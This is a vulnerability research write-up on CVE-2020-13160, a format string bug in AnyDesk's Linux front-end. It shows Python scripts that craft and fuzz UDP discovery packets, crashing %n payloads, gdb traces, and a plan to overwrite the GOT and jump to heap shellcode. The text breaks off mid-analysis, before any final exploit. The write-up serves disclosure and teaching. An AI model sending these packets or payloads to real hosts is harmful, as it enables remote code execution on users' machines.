AnyDesk UDP Discovery Remote Code Execution (CVE-2020-13160)

One of my goals for this year is to spend a little bit more of my spare time on real world applications. Doing so I took a look at the remote desktop application AnyDesk, which seems to quickly raise in popularity not only because of COVID-19. AnyDesk is available for a variety of operating systems including Windows, Linux, Android and iOS. By reversing and fuzzing the Linux version 5.5.2 of the application I was able to find a format string vulnerability, which can be used to gain Remote Code Execution (RCE) by sending a single UDP packet to the target machine. AnyDesk took the issue very seriously. They released a patch only three days after my notification (5.5.3) and paid me a bounty of 5.000 EUR. The vulnerability is tracked as CVE-2020-13160. Within this article I want to share all steps, which were involved in finding the vulnerability, understanding the bug and developing the RCE exploit. The article is divided into the following sections:

Fuzzing
Bug
Exploit
    – Strategy
    – The v in vsnprintf
    – Gaining arbitrary write
    – Controlling the instruction pointer
    – Hitting our shellcode: dynamic field width
    – Final exploit
Conclusion


Fuzzing

The AnyDesk application is running multiple processes with different permissions. The most valuable target is the service process /usr/bin/anydesk --service, since this process is running with root privileges. There are two older CVEs (CVE-2017-14397 and CVE-2018-13102), which target this process on Windows in order to escalate privileges. Both of these exploits are DLL injection/preloading vulnerabilities, which only work locally. My desire was to find a vulnerability, which can be exploited remotely.

At first we need to figure out which remote communication with the AnyDesk application is possible. This can simply be done by starting the application and using netstat to determine on which ports the application is listening:

user@w00d:~$ sudo netstat -tulpn | grep anydesk        
tcp        0      0 0.0.0.0:7070            0.0.0.0:*               LISTEN      598/anydesk         
udp        0      0 0.0.0.0:50001           0.0.0.0:*                           598/anydesk   

Accordingly the application is listening on TCP port 7070 and UDP port 50001. By displaying all anydesk processes, we can see that the listening process is the service process itself (PID 598). Also recognize the traybar process (PID 2983) as well as the front-end process (PID 3421):

user@w00d:~$ sudo ps aux | grep anydesk
root       598  0.0  0.3 531172 28620 ?        Ssl  08:56   0:02 /usr/bin/anydesk --service
user      2983  0.0  0.2 744288 23736 tty2     Sl+  08:58   0:00 /usr/bin/anydesk --tray
user      3421  0.0  0.4 864624 37760 tty2     Sl+  09:01   0:00 /usr/bin/anydesk

Before we can reasonably fuzz the application, we have to determine what data the application is usually expecting to receive on these ports. In order to get some sample data, we can inspect all traffic related to these ports using wireshark while interacting with the application.

According to the observations we can make with wireshark TCP port 7070 is used for the actual remote desktop connection and uses TLS to encrypt the traffic. The details are not relevant for our considerations here. The relevant port is UDP 50001, which is used to announce AnyDesk clients within a local network. On startup of AnyDesk we can see that our client sends UDP packets to 239.255.102.18 in order to announce its presence. The packet contains the hostname (w00d), the username (scryh), a profile picture as well as a few other information:

Assuming that these announcements are also processed by our own client, we now have some legitimate data in order to fuzz the application. At first I started by fuzzing the application using fuzzotron, which is written in C and is quite fast. fuzzotron uses radamsa and/or blab for the mutation of the input data. The setup is straightforward. We simply put our initial data observed in wireshark in a test-case file and then run fuzzotron providing among others the IP address and port as well as the PID, which fuzzotron should monitor for possible crashes.

Unfortunately I could not find any flaws that seemed to be exploitable. So I decided to change the approach. Instead of directly targeting the service process, which is listening on the network socket, we can focus on the front-end process (PID 2983 in the output above). The front-end process is responsible for displaying the GUI to the user and communicates with the service process to exchange information relevant for the GUI. When the service process receives a valid UDP announcement frame this frame is passed to the front-end process in order to display the announced device within the GUI:

To make our fuzzing input reach the front-end process we have to send valid announcement frames. The problem here is that most of the frames produced by the fuzzer we used so far are not valid, because there are mutated without any knowledge of the specific format of these frames. Accordingly most of the fuzzer-mutated frames are dropped by the service process and never reach the front-end process.

In order to create valid announcement frames we have to understand how the frames are built. Fortunately the format is not very complicated. By changing settings like our username or hostname and then observing the corresponding announcement frames our client is sending, we can derive how the frames are built. Among other things a frame contains the AnyDesk ID (4-byte), an operating system ID (1-byte) as well as the hostname and username, which are both transmitted as a 4-byte length field (big-endian) followed by the actual data. There are a few other fields and static values, which are not relevant for our considerations. The following python script creates a valid frame based on the given parameters and sends it to our local machine on UDP port 50001:

#!/usr/bin/env python

import struct
import socket

ip = '127.0.0.1'
port = 50001

def gen_discover_packet(ad_id, os, hn, user, inf, func):
  d  = chr(0x3e)+chr(0xd1)+chr(0x1)
  d += struct.pack('>I', ad_id)
  d += struct.pack('>I', 0)
  d += chr(0x2)+chr(os)
  d += struct.pack('>I', len(hn)) + hn
  d += struct.pack('>I', len(user)) + user
  d += struct.pack('>I', 0)
  d += struct.pack('>I', len(inf)) + inf
  d += chr(0)
  d += struct.pack('>I', len(func)) + func
  d += chr(0x2)+chr(0xc3)+chr(0x51)
  return d

p = gen_discover_packet(4919, 1, 'custom host', 'custom username', 'ad', 'main')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(p, (ip, port))
s.close()

After running the script we can see in the GUI that the front-end received the announcement and the fake device is displayed:

Now we are ready to explicitly fuzz certain fields of the frame. In order to do this we extend the python script to serve as our fuzzer. We can generate the actual fuzzing input by using radamsa again. Also we will monitor the front-end process and dump the last 10 fuzzing inputs, if the process died. The full fuzzer script, which targets the hostname, looks like this:

#!/usr/bin/env python

import struct
import socket
import subprocess
import psutil
import os
import time

ip = '127.0.0.1'
port = 50001
host_payloads = [''] * 10
dump_idx = 0


def mutate(pl):
  p = subprocess.Popen(['/usr/bin/radamsa', '-'], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
  return p.communicate(pl)[0]


def isAlive():
  for p in psutil.process_iter():
    if (p.name() == 'anydesk' and len(p.cmdline()) == 1): return True
  return False


def gen_discover_packet(ad_id, os, hn, user, inf, func):
  d  = chr(0x3e)+chr(0xd1)+chr(0x1)
  d += struct.pack('>I', ad_id)
  d += struct.pack('>I', 0)
  d += chr(0x2)+chr(os)
  d += struct.pack('>I', len(hn)) + hn
  d += struct.pack('>I', len(user)) + user
  d += struct.pack('>I', 0)
  d += struct.pack('>I', len(inf)) + inf
  d += chr(0)
  d += struct.pack('>I', len(func)) + func
  d += chr(0x2)+chr(0xc3)+chr(0x51)
  return d


def dump():
  global dump_idx
  print('dumping '+str(dump_idx))
  os.system('mkdir loot'+str(dump_idx))
  for i in range(len(host_payloads)):
    f = open('./loot'+str(dump_idx)+'/host_payload'+str(i), 'wb')
    f.write(host_payloads[i])
    f.close()
  dump_idx += 1
  os.system('anydesk&')
  time.sleep(5)


idx = 0
while True:
  time.sleep(5.0)
  host = mutate('host')
  if (len(host) > 45000): continue # max length
  host_payloads[idx%len(host_payloads)] = host
  p = gen_discover_packet(4919, 2, host, 'user', 'ad', 'main')
  s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  s.sendto(p, (ip, port))
  s.close()
  idx += 1
  if (not isAlive()): dump()

The sleep time for each fuzzing iteration is quite high (5 seconds), but it turned out that the GUI is only updated every 5 seconds. At first I thought about patching the binary in order to increase the update interval, but before digging into this I decided to just let the fuzzer run over a night.

At the next day the fuzzing results were ready to be evaluated. The front-end actually crashed a few times and the script stored the fuzzing inputs on disk. At first we need to determine which exact payload triggered the crash. Since we saved the last 10 payloads sent to the application, we just need to resend these payloads and determine which one makes the application crash. This can be done using the following script:

#!/usr/bin/env python

import struct
import socket
import sys

ip = '127.0.0.1'
port = 50001

def gen_discover_packet(ad_id, os, hn, user, inf, func):
  ...

host = open(sys.argv[1]).read()
p = gen_discover_packet(4919, 2, host, 'user', 'ad', 'main')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(p, (ip, port))
s.close()

By sending the following payload the front-end crashes:

user@w00d:~$ ./resend.py loot2/host_payload4

... crash ...

user@w00d:~$ hexdump -C loot2/host_payload4
00000000  61 61 61 61 25 64 25 6e  25 70 25 64 24 2b f3 a0  |aaaa%d%n%p%d$+..|
00000010  81 9c 81 bd 0b 7c                                 |.....||
00000016

By fuzzing the AnyDesk front-end process with a python script, which produces valid announcement frames and mutates the hostname using radamsa, we successfully generated an input, which crashes the application. The next step is to analyze the bug in order the determine, if we can exploit it.

Bug

So far we have fuzzed the AnyDesk front-end and identified an input which makes the front-end crash. The next step is to determine what the cause of this crash is and to examine if it is based on a bug which we can exploit.

At first we start up the front-end again and attach gdb to it (the pid_frontend.py script merely retrieves the current PID of the front-end process):

root@w00d:~# gdb /usr/bin/anydesk $(~/pid_frontend.py)

...
Reading symbols from /usr/bin/anydesk...(no debugging symbols found)...done.
Attaching to program: /usr/bin/anydesk, process 10911
[New LWP 10913]
[New LWP 10914]
[New LWP 10928]
[New LWP 10931]
[New LWP 10938]
[New LWP 10941]
[New LWP 10942]
[New LWP 10943]
[New LWP 10944]
[New LWP 10945]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

[----------------------------------registers-----------------------------------]
RAX: 0xfffffffffffffdfc 
RBX: 0x1cf7720 --> 0x100000005 
RCX: 0x7f491870ebf9 (<__GI___poll+73>:	cmp    rax,0xfffffffffffff000)
RDX: 0x37a0 
RSI: 0x3 
RDI: 0x1cf7720 --> 0x100000005 
RBP: 0x3 
RSP: 0x7ffe12cbcfb0 --> 0x1aa05cc --> 0x2 
RIP: 0x7f491870ebf9 (<__GI___poll+73>:	cmp    rax,0xfffffffffffff000)
R8 : 0x0 
R9 : 0x1ab6720 --> 0x1900000024 
R10: 0x1ce3000 --> 0x1ab6720 --> 0x1900000024 
R11: 0x293 
R12: 0x37a0 
R13: 0x37a0 
R14: 0x7f491d0b9f70 (<g_poll>:	mov    esi,esi)
R15: 0x3
EFLAGS: 0x293 (CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7f491870ebef <__GI___poll+63>:	mov    rdi,rbx
   0x7f491870ebf2 <__GI___poll+66>:	mov    eax,0x7
   0x7f491870ebf7 <__GI___poll+71>:	syscall 
=> 0x7f491870ebf9 <__GI___poll+73>:	cmp    rax,0xfffffffffffff000
   0x7f491870ebff <__GI___poll+79>:	ja     0x7f491870ec32 <__GI___poll+130>
   0x7f491870ec01 <__GI___poll+81>:	mov    edi,r8d
   0x7f491870ec04 <__GI___poll+84>:	mov    DWORD PTR [rsp+0xc],eax
   0x7f491870ec08 <__GI___poll+88>:	call   0x7f491872a740 <__libc_disable_asynccancel>
[------------------------------------stack-------------------------------------]
0000| 0x7ffe12cbcfb0 --> 0x1aa05cc --> 0x2 
0008| 0x7ffe12cbcfb8 --> 0x1cf7720 --> 0x100000005 
0016| 0x7ffe12cbcfc0 --> 0x1957be0 --> 0x0 
0024| 0x7ffe12cbcfc8 --> 0x3 
0032| 0x7ffe12cbcfd0 --> 0x1cf7720 --> 0x100000005 
0040| 0x7ffe12cbcfd8 --> 0x7f491d0aa5c9 (mov    r13d,eax)
0048| 0x7ffe12cbcfe0 --> 0x0 
0056| 0x7ffe12cbcfe8 --> 0x101957be0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00007f491870ebf9 in __GI___poll (fds=0x1cf7720, nfds=0x3, timeout=0x37a0) at ../sysdeps/unix/sysv/linux/poll.c:29
29	../sysdeps/unix/sysv/linux/poll.c: No such file or directory.
gdb-peda$ c
Continuing.

Now we resend the payload, which caused the crash:

user@w00d:~$ ./resend.py loot2/host_payload4

As expected the application raises a segmentation fault:

Thread 1 "anydesk" received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x7ffe12cbb800 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 56: Invalid UTF-8 encoded text in name - not valid 'aaaa%d%n%p%d$+\201\275\v|'")
RCX: 0x0 
RDX: 0x7ffe12cbc4f8 --> 0x0 
RSI: 0x7ffe12cbb568 --> 0xd24f18983b49a900 
RDI: 0x7ffe12cbb5b0 --> 0x7ffefbad8001 
RBP: 0x7ffe12cbb5a0 --> 0x7ffe12cbbc00 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 56: Invalid UTF-8 encoded text in name - not valid 'aaaa30849456\275\313\022\376\177")
RSP: 0x7ffe12cbb030 --> 0x7f491ec3a6f0 (<gtk_widget_destroy>:	push   rbx)
RIP: 0x7f4918657932 (<_IO_vfprintf_internal+9634>:	mov    DWORD PTR [rax],r13d)
R8 : 0x0 
R9 : 0x0 
R10: 0x0 
R11: 0x7ffe12cbb88c --> 0xf32b24642570256e 
R12: 0x7ffe12cbc4c8 --> 0x3000000020 (' ')
R13: 0x91 
R14: 0x7ffe12cbb5b0 --> 0x7ffefbad8001 
R15: 0x6e ('n')
EFLAGS: 0x10212 (carry parity ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7f4918657928 <_IO_vfprintf_internal+9624>:	add    eax,0x8
   0x7f491865792b <_IO_vfprintf_internal+9627>:	mov    DWORD PTR [r12],eax
   0x7f491865792f <_IO_vfprintf_internal+9631>:	mov    rax,QWORD PTR [rdx]
=> 0x7f4918657932 <_IO_vfprintf_internal+9634>:	mov    DWORD PTR [rax],r13d
   0x7f4918657935 <_IO_vfprintf_internal+9637>:	jmp    0x7f4918655930 <_IO_vfprintf_internal+1440>
   0x7f491865793a <_IO_vfprintf_internal+9642>:	mov    QWORD PTR [rbp-0x4e8],r11
   0x7f4918657941 <_IO_vfprintf_internal+9649>:	mov    QWORD PTR [rbp-0x4e0],rax
   0x7f4918657948 <_IO_vfprintf_internal+9656>:	call   0x7f4918684150 <_IO_vtable_check>
[------------------------------------stack-------------------------------------]
0000| 0x7ffe12cbb030 --> 0x7f491ec3a6f0 (<gtk_widget_destroy>:	push   rbx)
0008| 0x7ffe12cbb038 --> 0x0 
0016| 0x7ffe12cbb040 --> 0x7ffe12cbb88a ("d%n%p%d$+\201\275\v|'")
0024| 0x7ffe12cbb048 --> 0x7ffe00000000 
0032| 0x7ffe12cbb050 --> 0x0 
0040| 0x7ffe12cbb058 --> 0x1 
0048| 0x7ffe12cbb060 --> 0xffffffffffffffff 
0056| 0x7ffe12cbb068 --> 0x100000000 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007f4918657932 in _IO_vfprintf_internal (s=s@entry=0x7ffe12cbb5b0, 
    format=format@entry=0x7ffe12cbb800 "Failed to set text from markup due to error parsing markup: Error on line 1 char 56: Invalid UTF-8 encoded text in name - not valid 'aaaa%d%n%p%d$+\201\275\v|'", ap=ap@entry=0x7ffe12cbc4c8) at vfprintf.c:1642
1642	vfprintf.c: No such file or directory.

As we can see, the crash is caused by the instruction mov DWORD PTR [rax], r13d within the function _IO_vfprintf_internal. Since the value of rax is 0 a segmentation fault is raised. Using the command bt we can print the stacktrace:

gdb-peda$ bt
#0  0x00007f4918657932 in _IO_vfprintf_internal (s=s@entry=0x7ffe12cbb5b0, 
    format=format@entry=0x7ffe12cbb800 "Failed to set text from markup due to error parsing markup: Error on line 1 char 56: Invalid UTF-8 encoded text in name - not valid 'aaaa%d%n%p%d$+\201\275\v|'", ap=ap@entry=0x7ffe12cbc4c8) at vfprintf.c:1642
#1  0x00007f4918682910 in _IO_vsnprintf (
    string=0x7ffe12cbbc00 "Failed to set text from markup due to error parsing markup: Error on line 1 char 56: Invalid UTF-8 encoded text in name - not valid 'aaaa30849456\275\313\022\376\177", maxlen=<optimized out>, 
    format=0x7ffe12cbb800 "Failed to set text from markup due to error parsing markup: Error on line 1 char 56: Invalid UTF-8 encoded text in name - not valid 'aaaa%d%n%p%d$+\201\275\v|'", args=0x7ffe12cbc4c8) at vsnprintf.c:114
#2  0x00000000008ab34b in ?? ()
#3  0x00000000008aba98 in ?? ()
#4  0x0000000000434395 in ?? ()
#5  0x00007f491d0b11cd in g_logv () from /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#6  0x00007f491d0b133f in g_log () from /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
...

According to the output the return address after the vsnprintf call is 0x8ab34b (#2). Let’s examine the code at this address in ghidra:

The call to vsnprintf is at 0x8ab346. The third parameter of the function is the format string to be used (local_cb8). A few lines before we can see that the fourth parameter of the outer function (param_4) is copied into local_cb8 using strncpy. In order to determine which parameters were passed to vsnprintf let’s set a breakpoint on the call and resend the payload:

gdb-peda$ b *0x8ab346
Breakpoint 1 at 0x8ab346
gdb-peda$ c
Continuing.
user@w00d:~$ ./resend.py loot2/host_payload4
[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x11c5040 --> 0x21 ('!')
RCX: 0x7ffec15e4248 --> 0x3000000010 
RDX: 0x7ffec15e3580 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 56: Invalid UTF-8 encoded text in name - not valid 'aaaa%d%n%p%d$+\201\275\v|'")
RSI: 0x400 
RDI: 0x7ffec15e3980 --> 0x7 
RBP: 0x5 
RSP: 0x7ffec15e34a0 --> 0x7ffec15e3670 --> 0x0 
RIP: 0x8ab346 (call   0x412d90 <vsnprintf@plt>)
R8 : 0x0 
R9 : 0x10 
R10: 0xffffffa0 
R11: 0x7fb9b72f9550 --> 0xfff08320fff08310 
R12: 0x7ffec15e4248 --> 0x3000000010 
R13: 0xb366d8 --> 0x62696c67 ('glib')
R14: 0x2475ec0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 56: Invalid UTF-8 encoded text in name - not valid 'aaaa%d%n%p%d$+\201\275\v|'")
R15: 0x4
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffec15e3980 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffec15e3580 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 56: Invalid UTF-8 encoded text in name - not valid 'aaaa%d%n%p%d$+\201\275\v|'")
arg[3]: 0x7ffec15e4248 --> 0x3000000010 
[------------------------------------stack-------------------------------------]
0000| 0x7ffec15e34a0 --> 0x7ffec15e3670 --> 0x0 
0008| 0x7ffec15e34a8 --> 0x7ffec15e3600 ("lid 'aaaa%d%n%p%d$+\201\275\v|'")
0016| 0x7ffec15e34b0 --> 0x25ed450 --> 0x0 
0024| 0x7ffec15e34b8 --> 0x7ffec15e3600 ("lid 'aaaa%d%n%p%d$+\201\275\v|'")
0032| 0x7ffec15e34c0 --> 0x7ffec15e3820 --> 0x0 
0040| 0x7ffec15e34c8 --> 0x7fb9bbbe89d4 (<g_hash_table_lookup+52>:	mov    r8d,0x2)
0048| 0x7ffec15e34d0 --> 0x23e8230 --> 0x2253ab0 --> 0x2244340 --> 0x31 ('1')
0056| 0x7ffec15e34d8 --> 0x2622e60 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 1 "anydesk" hit Breakpoint 1, 0x00000000008ab346 in ?? ()

We hit the breakpoint on the call to vsnprintf. The third parameter (RDX) contains the format string. The passed string obviously contains an error message about an invalid UTF-8 encoded text. But this string does also contain the string, which caused the error: 'aaaa%d%n%p%d$+\201\275\v|'. This is our fuzzing input! In the format string! We have found a format string vulnerability.

In this case the actual crash of the application was caused by the %n format specifier within the fuzzer-generated data. The %n format specifier can be used to write data. The address, where the data in this case is supposed to be written, happened to be null. This caused the segmentation fault.

Analyzing the code a little bit further we can determine that the call to vsnprintf prepares a string, which will be written to the log file (~/.anydesk/anydesk.trace). The fourth parameter of the outer function, which will be used as the format string, is in this case an error message generated by the glib library, which is raised because the text contains an invalid UTF-8 sequence. This error message was obviously assumed to be static. However the error message contains the input, which caused the error (the fuzzed hostname), which we can control. Thus we can control parts of the format string by inserting an invalid UTF-8 sequence into the hostname of an announcement frame. This results in a classical format string vulnerability.

Also it turned out that the vulnerable call is actually made twice. By sending an announcement frame with an invalid UTF-8 sequence and a format specifier ('\x85\xfeTEST %p'), we can see the result in ~/.anydesk/anydesk.trace:

user@w00d:~$ tail -n 3 ~/.anydesk/anydesk.trace 
warning 2020-05-25 08:59:02.119   frontend   main   4431   4431                                  glib - Failed to set text from markup due to error parsing markup: Error on line 1 char 43: Invalid UTF-8 encoded text in name - not valid '??TEST 0x15334e0'
warning 2020-05-25 08:59:02.125   frontend   main   4431   4431                                  glib - Failed to set text from markup due to error parsing markup: Error on line 1 char 43: Invalid UTF-8 encoded text in name - not valid '??TEST 0x15334e0'
   info 2020-05-25 08:59:02.132   frontend   main   4431   4431                     unix_app.frontend - Monitoring online states.

The error message has been written twice to the log file. We can also see how the inserted format specifier (%p) has been evaluated.

After analyzing the segmentation fault discovered by fuzzing the front-end process, we identified that the cause of the crash is a format string vulnerability. The next step is to develop an exploit for the identified vulnerability.

Exploit

Within my writeup on RPISEC/MBE lab04B I described the basics on how to exploit a format string vulnerability using the %n format specifier. This format specifier can be used to write data and also caused the segmentation fault when fuzzing the application. Within this section we will take a look at how to exploit the format string vulnerability in this very specific setting in order to gain Remote Code Execution (RCE).

Strategy

Probably the very first thing everyone does when facing a binary exploitation challenge is to check which security mechanisms are enabled. In this case the result is very surprising:

user@w00d:~$ checksec /usr/bin/anydesk
[*] '/usr/bin/anydesk'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments

Actually no protection mechanisms are enabled, which makes the exploitation more easy.

While developing an exploit I would generally suggest to disable ASLR and just keep in mind that we have to bypass it. This makes it easier to compare addresses of multiple runs of the application:

user@w00d:~$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space 
0

The first goal we need to achieve is to control the instruction pointer. Since there is No RELRO, we can use the %n format specifier to overwrite an entry within the Global Offset Table (GOT). As the heap segment, where our input data will be stored, is actually executable, we can store a shellcode there and make the GOT entry point to this shellcode. On the next call of the function, which GOT entry we overwrote, our shellcode is executed.

Although these steps sound quite straight forward, achieving this turned out to be a little bit more challenging. Let’s have a look.

The v in vsnprintf

The next instruction after the vulnerable call to vsnprintf is a call to the function time. Accordingly we can overwrite the GOT entry of time and thus redirecting the control flow immediately after the vsnprintf call. In order to use the %n format specifier to overwrite the GOT entry of time, we need to be able to reference the address of the GOT entry. In a classical format string exploit this is achieved by being able to control data on the stack. Since all values on the stack, which are equal or below to the current RSP, can be referenced with an appropriate argument selector (e.g. %35$n), the desired address can simply be put into the controlled stack data. Using the appropriate argument selector in combination with the %n format specifier causes the function to write the amount of characters written so far to this address.

In this case things are a little bit different. As you probably already noticed the vulnerable call is not made to the function snprintf, which signature looks like this:

snprintf(char *s, size_t n, const char *format, ...)

…, but rather vsnprintf, which signature looks like this:

vsnprintf(char *s, size_t n, const char *format, va_list arg)

The difference here is that the format string arguments are not directly passed as variable arguments (...), but within a va_list parameter (arg). Each of the functions in the printf family has a corresponding va_list function beginning with the letter v:

user@w00d:~$ man 3 printf
...

       #include <stdio.h>

       int printf(const char *format, ...);
       int fprintf(FILE *stream, const char *format, ...);
       int dprintf(int fd, const char *format, ...);
       int sprintf(char *str, const char *format, ...);
       int snprintf(char *str, size_t size, const char *format, ...);

       #include <stdarg.h>

       int vprintf(const char *format, va_list ap);
       int vfprintf(FILE *stream, const char *format, va_list ap);
       int vdprintf(int fd, const char *format, va_list ap);
       int vsprintf(char *str, const char *format, va_list ap);
       int vsnprintf(char *str, size_t size, const char *format, va_list ap);

The structure of va_list is actually specific to the Application Binary Interface (ABI), which e.g. describes the calling convention, how the stack is organized and so on. On x86, where all function parameters are passed on the stack, va_list simply consists of a pointer to the stack area, where the original parameters are stored. With x64 things get a little bit more complex. The first six parameters are passed in registers (RDI, RSI, RDX, RCX, R8, R9), also there are special registers for floating point parameters (XMM0XMM7). Additional parameters are passed on the stack as with x86. There is a very good blog post describing the details, which can be found here. The structure of the va_list looks like this on x64:

typedef struct {
  unsigned int gp_offset;
  unsigned int fp_offset;
  void *overflow_arg_area;
  void *reg_save_area;
} va_list[1];

There are two pointers: overflow_arg_area, which points to the first argument originally passed on the stack and reg_save_area, which points to an area on the stack where the arguments passed via registers are saved (the first six general parameters as well as eight floating point parameters). Both values gp_offset and fp_offset are offsets relative to reg_save_arena and reference the first general register parameter (gp_offset) as well as the first floating point parameter (fp_offset). These offsets exists because there are usually other parameters before the variable parameters (e.g. the format string itself).

Let’s have a practical look at this on the AnyDesk front-end. We attach gdb to it and set a breakpoint on the call to vsnprintf:

user@w00d:~$ sudo gdb /usr/bin/anydesk $(~/pid_frontend.py)
...
Attaching to program: /usr/bin/anydesk, process 3863
...
gdb-peda$ b *0x8ab346
Breakpoint 1 at 0x8ab346
gdb-peda$ c
Continuing.

Now we can use the python function again, which we created to generate announcement frames. In this case we send an announcement with the following hostname:

p = gen_discover_packet(4919, 1, '\x85\xfe 1.%p 2.%p 3.%p 4.%p 5.%p 6.%p 7.%p 8.%p 9.%p 10.%p', 'custom username', 'ad', 'main')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(p, (ip, port))
s.close()

The beginning of the hostname ('\x85\xfe') is an invalid UTF-8 sequence, which will trigger the format string vulnerability (any other invalid UTF-8 sequence can be used here). After this we use the %p format specifier to print the values of the first ten arguments.

A few seconds after running the script (up to 5 seconds until the GUI refreshes) our breakpoint is hit:

[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x11c5040 --> 0x21 ('!')
RCX: 0x7ffffffeb898 --> 0x3000000010 
RDX: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 87: Invalid UTF-8 encoded text in name - not valid '\205\376 1.%p 2.%p 3.%p 4.%p 5.%p 6.%p 7.%p 8.%p 9.%p 10.%p'")
RSI: 0x400 
RDI: 0x7ffffffeafd0 --> 0x7 
RBP: 0x5 
RSP: 0x7ffffffeaaf0 --> 0x7ffffffeacc0 --> 0x0 
RIP: 0x8ab346 (call   0x412d90 <vsnprintf@plt>)
R8 : 0x0 
R9 : 0x10 
R10: 0xffffff81 
R11: 0x7ffff1548550 --> 0xfff08320fff08310 
R12: 0x7ffffffeb898 --> 0x3000000010 
R13: 0xb366d8 --> 0x62696c67 ('glib')
R14: 0x1453d80 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 87: Invalid UTF-8 encoded text in name - not valid '\205\376 1.%p 2.%p 3.%p 4.%p 5.%p 6.%p 7.%p 8.%p 9.%p 10.%p'")
R15: 0x4
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffffffeafd0 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffffffeabd0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 87: Invalid UTF-8 encoded text in name - not valid '\205\376 1.%p 2.%p 3.%p 4.%p 5.%p 6.%p 7.%p 8.%p 9.%p 10.%p'")
arg[3]: 0x7ffffffeb898 --> 0x3000000010 
[------------------------------------stack-------------------------------------]
0000| 0x7ffffffeaaf0 --> 0x7ffffffeacc0 --> 0x0 
0008| 0x7ffffffeaaf8 --> 0x7ffffffeac50 --> 0x20fe85272064696c 
0016| 0x7ffffffeab00 --> 0x158cba0 --> 0x0 
0024| 0x7ffffffeab08 --> 0x7ffffffeac50 --> 0x20fe85272064696c 
0032| 0x7ffffffeab10 --> 0x7ffffffeae70 --> 0x0 
0040| 0x7ffffffeab18 --> 0x7ffff5e379d4 (<g_hash_table_lookup+52>:	mov    r8d,0x2)
0048| 0x7ffffffeab20 --> 0x138ca30 --> 0x11f6ab0 --> 0x11e7340 --> 0x31 ('1')
0056| 0x7ffffffeab28 --> 0x1572280 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 1 "anydesk" hit Breakpoint 1, 0x00000000008ab346 in ?? ()
gdb-peda$ 

The fourth parameter (RCX = 0x7ffffffeb898) is the va_list structure. The first two unsigned ints (4 bytes each) are the members gp_offset and fp_offset:

gdb-peda$ x/2xw 0x7ffffffeb898
0x7ffffffeb898:	0x00000010	0x00000030

After these values both pointers overflow_arg_area and reg_save_area follow:

gdb-peda$ x/2xg 0x7ffffffeb898+8
0x7ffffffeb8a0:	0x00007ffffffeb970	0x00007ffffffeb8b0

Since the value of gp_offset is 0x10, the function which was originally called with variable arguments had two preceding general parameters. In order to display the next four general parameters assumed to be passed in the remaining registers, we need to add gp_offset (0x10) to the reg_save_area pointer (0x00007ffffffeb8b0):

gdb-peda$ x/4xg 0x00007ffffffeb8b0+0x10
0x7ffffffeb8c0:	0x0000000001453d80	0x0000000000000000
0x7ffffffeb8d0:	0x00007ffff1784c40	0x0000000000000010

vsnprintf assumes that these four values were passed in registers. All following values are assumed to be passed via the stack and are referenced by the overflow_arg_area pointer (0x00007ffffffeb970):

gdb-peda$ x/6xg 0x00007ffffffeb970
0x7ffffffeb970:	0x0000000000b366d8	0x0000000000000000
0x7ffffffeb980:	0x0000000001482b01	0x00007ffff5e4ee24
0x7ffffffeb990:	0x0000000001453d80	0x0000000000000000

By entering ni the call to vsnprintf is made and we can inspect the resulting string (set print elements 0 displays the whole string without truncation):

gdb-peda$ ni
...
gdb-peda$ set print elements 0
gdb-peda$ x/s 0x7ffffffeafd0
